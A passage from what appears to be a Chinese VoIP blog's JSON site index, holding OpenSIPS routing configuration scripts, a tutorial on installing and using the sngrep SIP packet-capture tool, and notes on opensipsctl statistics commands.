(!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if (!is_method(\u0026#34;INVITE\u0026#34;)) { sl_send_reply(\u0026#34;405\u0026#34;, \u0026#34;Method Not Allowed\u0026#34;); exit; } do_accounting(\u0026#34;log\u0026#34;); if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/dtmf-lan/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=4 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen = udp:10.","title":"freeswitch-dtmf-language"},{"content":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=4 log_stderror=yes log_facility=LOG_LOCAL0 children=4 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:10.0.0.3:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;mid_registrar.so\u0026#34; modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;mode\u0026#34;, 2) /* 0 = mirror / 1 = ct / 2 = AoR */ modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;outgoing_expires\u0026#34;, 7200) modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;insertion_mode\u0026#34;, 0) /* 0 = contact; 1 = path */ #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) #### UDP protocol loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # sequential requests within a dialog should # take the path determined by record-routing if (loose_route()) { if (is_method(\u0026#34;BYE\u0026#34;)) { # do accunting, even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } else if (is_method(\u0026#34;INVITE\u0026#34;)) { # even if in most of the cases is useless, do RR for # re-INVITEs alos, as some buggy clients do change route set # during the dialog. record_route(); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { # non loose-route, but stateful ACK; must be an ACK after # a 487 or e.g. 404 from upstream server t_relay(); exit; } else { # ACK without matching transaction -\u0026gt; # ignore and discard exit; } } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); } exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if (is_method(\u0026#34;REGISTER\u0026#34;)) { mid_registrar_save(\u0026#34;location\u0026#34;); switch ($retcode) { case 1: xlog(\u0026#34;forwarding REGISTER to main registrar ($$ci=$ci)\\n\u0026#34;); $ru = \u0026#34;sip:10.0.0.3:5070\u0026#34;; t_relay(); break; case 2: xlog(\u0026#34;absorbing REGISTER! ($$ci=$ci)\\n\u0026#34;); break; default: xlog(\u0026#34;failed to save registration! ($$ci=$ci)\\n\u0026#34;); } exit; } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;log\u0026#34;); } if (!uri==myself) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # initial requests from main registrar, need to look them up! if (is_method(\u0026#34;INVITE|MESSAGE\u0026#34;) \u0026amp;\u0026amp; $si == \u0026#34;10.0.0.3\u0026#34; \u0026amp;\u0026amp; $sp == 5070) { xlog(\u0026#34;looking up $ru!\\n\u0026#34;); if (!mid_registrar_lookup(\u0026#34;location\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } t_relay(); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/mid-register/","summary":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=4 log_stderror=yes log_facility=LOG_LOCAL0 children=4 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:10.","title":"mid-registrar"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;b2b_entities.so\u0026#34; loadmodule \u0026#34;siprec.so\u0026#34; loadmodule \u0026#34;rtpproxy.so\u0026#34; modparam(\u0026#34;rtpproxy\u0026#34;, \u0026#34;rtpproxy_sock\u0026#34;, \u0026#34;udp:127.0.0.1:7899\u0026#34;) ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); rtpproxy_engage(); siprec_start_recording(\u0026#34;sip:127.0.0.1:5090\u0026#34;); do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/siprec/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.","title":"siprec"},{"content":"1. 安装 1.1. centos vim /etc/yum.repos.d/irontec.repo\n[irontec] name=Irontec RPMs repository baseurl=http://packages.irontec.com/centos/$releasever/$basearch/ rpm \u0026ndash;import http://packages.irontec.com/public.keyyum install sngrep\n1.2 debian/ubuntu # debian 安装sngrep echo \u0026#34;deb http://packages.irontec.com/debian jessie main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list wget http://packages.irontec.com/public.key -q -O - | apt-key add - apt-get install sngrep -y debian buster 即 debian10以上可以直接 apt-get install sngrep 1.3 arch/manjaro yay -Syu sngrep 参考: https://aur.archlinux.org/packages/sngrep/\n如果报错,编辑 /etc/makepkg.conf文件,删除其中的-Werror=format-security\nCFLAGS=\u0026#34;-march=x86-64 -mtune=generic -O2 -pipe -fno-plt -fexceptions \\ -Wp,-D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security \\ -fstack-clash-protection -fcf-protection\u0026#34; 2. 命令行参数 sngrep [-hVcivNqrD] [-IO pcap_dump] [-d dev] [-l limit] [-k keyfile] [-LH capture_url] [\u0026lt;match expression\u0026gt;] [\u0026lt;bpf filter\u0026gt;] -h --help: 显示帮助信息 -V --version: 显示版本信息 -d --device: 指定抓包的网卡 -I --input: 从pacp文件中解析sip包 -O --output: 输出捕获的包到pacp文件中 -c --calls: 仅显示invite消息 -r --rtp: Capture RTP packets payload 捕获rtp包 -l --limit: 限制捕获对话的数量 -i --icase: 使大小写不敏感 -v --invert: 颠倒(不太明白) -N --no-interface: Don\u0026rsquo;t display sngrep interface, just capture -q --quiet: Don\u0026rsquo;t print captured dialogs in no interface mode -D --dump-config: Print active configuration settings and exit -f --config: Read configuration from file -R --rotate: Rotate calls when capture limit have been reached. -H --eep-send: Homer sipcapture url (udp:X.X.X.X:XXXX) -L --eep-listen: Listen for encapsulated packets (udp:X.X.X.X:XXXX) -k --keyfile: RSA private keyfile to decrypt captured packets 3. 页面 sngrep有四个页面,每个页面都有一些不同的快捷键。\n呼叫列表页面 呼叫流程页面 原始呼叫信息页面 信息对比页面 3.1 呼叫列表页面 快捷键\nArrow keys: Move through the list,除了上下箭头还可以使用j,k来移动光标 Enter: Display current or selected dialog(s) message flow A: Auto scroll to new calls,自动滚动到新的call F2 or s: Save selected/all dialog(s) to a PCAP file, 保存dialog到pacp文件 F3 or / or TAB: Enter a display filter. This filter will be applied to the text lines in the list,进入搜索 F4 or x: Display current selected dialog and its related one. 回到第一个sip消息上 F5: Clear call list, 清空呼叫列表 F6 or r: Display selected dialog(s) messages in raw text, 显示原始的sip消息 F7 or f: Show advanded filters dialogs 显示高级过滤弹窗 F9 or l: Turn on/off address resolution if enabled F10 or t: Select displayed columns, 显示或者隐藏侧边sip消息栏 呼叫列表页面还能够显示两个弹窗, 按f可以显示高级过滤配置\n按t可以显示, 自定义呼叫列选项弹窗\n3.2 呼叫流程页面 快捷键\n**Keybindings:\nArrow keys: Move through messages Enter: Display current message raw (so you can copy payload) F2 or d: 显示sdp消息,f2的某个模式会让时序图更紧凑 F3 or t: 显示或者关闭sip侧边栏 F4 or x: 回到顶部 F5 or s: 每个ip地址仅仅显示一列 F6 or R: 显示原始的sip消息 F7 or c: 改变颜色模式, 有的颜色模式很容易让人无法区分当前查看的sip消息是哪一个,所以需要改变颜色模式 F9 or l: Turn on/off address resolution if enabled 9 and 0: 增加或者减少侧边栏的宽度 T: 重绘侧边栏 D: 仅显示带有sdp的消息 空格键:选中一个sip消息,再次找个sip消息,然后就会进入对比模式 F1 or h: 显式帮助信息页面 3.3 原始sip消息界面 3.3 消息对比界面 在呼叫列表页面按空格键选中一个消息,然后选择另外一个sip消息后,再次按空格键,就可以进入消息对比页面\n4. 分析媒体问题 使用 sngrep -r 可以用来捕获媒体流,默认不加 -r 则只能显示信令。\n在呼叫流程页面,按下F3, 可以动态的查看媒体流的情况。在分析语音问题时,这是非常方便的分析工具。 5. 扩展技法 5.1 无界面模式 假如说有个很大的语音文件,假如说有1.5G吧,如果用wireshark直接打开,有可能wireshark直接卡死,也有可能在搜索的时候就崩溃了。\n即使有sngrep来直接读取pcap文件,也可能会非常慢。\n假如说我们只想从这1.5G文件中找到本叫号码包含1234的,应该怎么处理呢?\n用下面的命令就可以:\nsngrep -rI test.pcap 1234 -N -O dst.pcap Dialog count: 17 -r 读区语音流 -I 从pcap文件中读取 -N 不要界面 -O 将匹配的结果写到其他文件中 经过上面的命令,一个很大的pcap文件,在处理之后,就会变成我们关心的小的包文件。比较容易处理了。\n5.1 个性化配置 在呼叫列表界面,按F8可以进入到个性化配置界面,如下:\n个性化配置页面有三个Tab页面, 三个页面可以用翻页的pageUp, pageDown来切换。在macbook上可能没有翻页键,那你要用fn + 上下方向键 来翻页\nInterface Capture Call Flow 在每个页面可以用上下键来选择不同的设置项,按左右键改变对应的值。也可以按空格键来改变对应的值。\n在每个Tab页面,可以按Tab键在设置项和下面的Accept和Save、Cancel之间切换。\n我们的个性化配置可以用Save来保存下来,不然每次都要再设置一边。\n1. interface 页面 2. Capture设置界面 配置抓包相关的信息,例如最大抓包的数量,网卡设备,是否启用事务,默认的保存文件路径等等。 3. Call Flow页面 这个页面用来设置呼叫时序图页面。就不再过多介绍。\n我用的比较多的,可能是Merge Columns witch same addrsss。 sngrep默认用IP:PORT作为时序图中的一个竖线。但是如果IP相同,端口号不同。sngrep就会划出很多竖线。启用了改项之后,就只会根据IP来划竖线。 区分IP和端口: Merge columns with same address on 表示只根据IP来划竖线 off 表示根据IP:PORT来划线,如果你想在竖线上能看到端口信息,则需要设置为off 如下图所示,Merge columns with same address: off 如何更容易区分当前是在哪一信令上? 有时候移动的快一点,例如只能看到SIP消息是REGISTER, 但是具体是哪一个REGISTER, 看的眼疼也区分不出来。 这时候Call Flow中的Selected message highlight就派上用场。\nblod 加粗 reverse 反色 reverseblod 反色并且加粗 一般情况下,reverse或者reverseblod都能让你更好的区分,下面就是使用reverser模式下的时序图\n可以很明显的看到,第三个REGISTER的背景色变一大块,所以当前就是在第三个REGISTER信令上。 6 . sngrep使用注意点 不要长时间用sngrep抓包,否则sgrep会占用非常多的内存。如果必须抓一段时间的包,务必使用tcpdump。 某些情况下,sngrep会丢包 某些情况下,sngrep会什么包都抓包不到,注意此时很可能要使用-d去指定抓包的网卡 sngrep只能捕获本机网卡的收到和发送的流量。假如ABC分别是三台独立虚拟机的SIP服务器,在B上抓包只能分析A-B, 和B-C直接的流量。 再次强调:sngrep不适合长时间抓包,只适合短时间抓包分析问题。如果你需要记录所有的sip消息,并展示。可以考虑使用siphub,或者homer。 ","permalink":"https://wdd.js.org/opensips/tools/sngrep/","summary":"1. 安装 1.1. centos vim /etc/yum.repos.d/irontec.repo\n[irontec] name=Irontec RPMs repository baseurl=http://packages.irontec.com/centos/$releasever/$basearch/ rpm \u0026ndash;import http://packages.irontec.com/public.keyyum install sngrep\n1.2 debian/ubuntu # debian 安装sngrep echo \u0026#34;deb http://packages.irontec.com/debian jessie main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list wget http://packages.irontec.com/public.key -q -O - | apt-key add - apt-get install sngrep -y debian buster 即 debian10以上可以直接 apt-get install sngrep 1.3 arch/manjaro yay -Syu sngrep 参考: https://aur.archlinux.org/packages/sngrep/\n如果报错,编辑 /etc/makepkg.conf文件,删除其中的-Werror=format-security\nCFLAGS=\u0026#34;-march=x86-64 -mtune=generic -O2 -pipe -fno-plt -fexceptions \\ -Wp,-D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security \\ -fstack-clash-protection -fcf-protection\u0026#34; 2.","title":"sngrep: 最好用的sip可视化抓包工具"},{"content":"**opensipsctl fifo get_statistics all **命令可以获取所有统计数据,在所有统计数据中,我们只关心内存,事务和回话的数量。然后将数据使用curl工具写入到influxdb中。\nopensipsctl fifo reset_statistics all 重置统计数据\n常用指令 命令 描述 opensipsctl fifo which 显示所有可用命令 opensipsctl fifo ps 显示所有进程 opensipsctl fifo get_statistics all 获取所有统计信息 opensipsctl fifo get_statistics core: 获取内核统计信息 opensipsctl fifo get_statistics net: 获取网路统计信息 opensipsctl fifo get_statistics pkmem: 获取私有内存相关信息 opensipsctl fifo get_statistics tm: 获取事务模块统计信息 opensipsctl fifo get_statistics sl: 获取sl模块统计信息 opensipsctl fifo get statistics shmem: 获取共享内存相关信息 opensipsctl fifo get statistics usrloc: 获取 opensipsctl fifo get statistics registrar: 获取注册统计信息 opensipsctl fifo get statistics uri: 获取uri统计信息 opensipsctl fifo get statistics load: 获取负载信息 opensipsctl fifo reset_statistics all 重置所有统计信息 shmem:total_size:: 6467616768 shmem:used_size:: 4578374040 shmem:real_used_size:: 4728909408 shmem:max_used_size:: 4728909408 shmem:free_size:: 1738707360 shmem:fragments:: 1 # 事务 tm:UAS_transactions:: 296337 tm:UAC_transactions:: 30 tm:2xx_transactions:: 174737 tm:3xx_transactions:: 0 tm:4xx_transactions:: 110571 tm:5xx_transactions:: 2170 tm:6xx_transactions:: 0 tm:inuse_transactions:: 289651 dialog:active_dialogs:: 156 dialog:early_dialogs:: 680 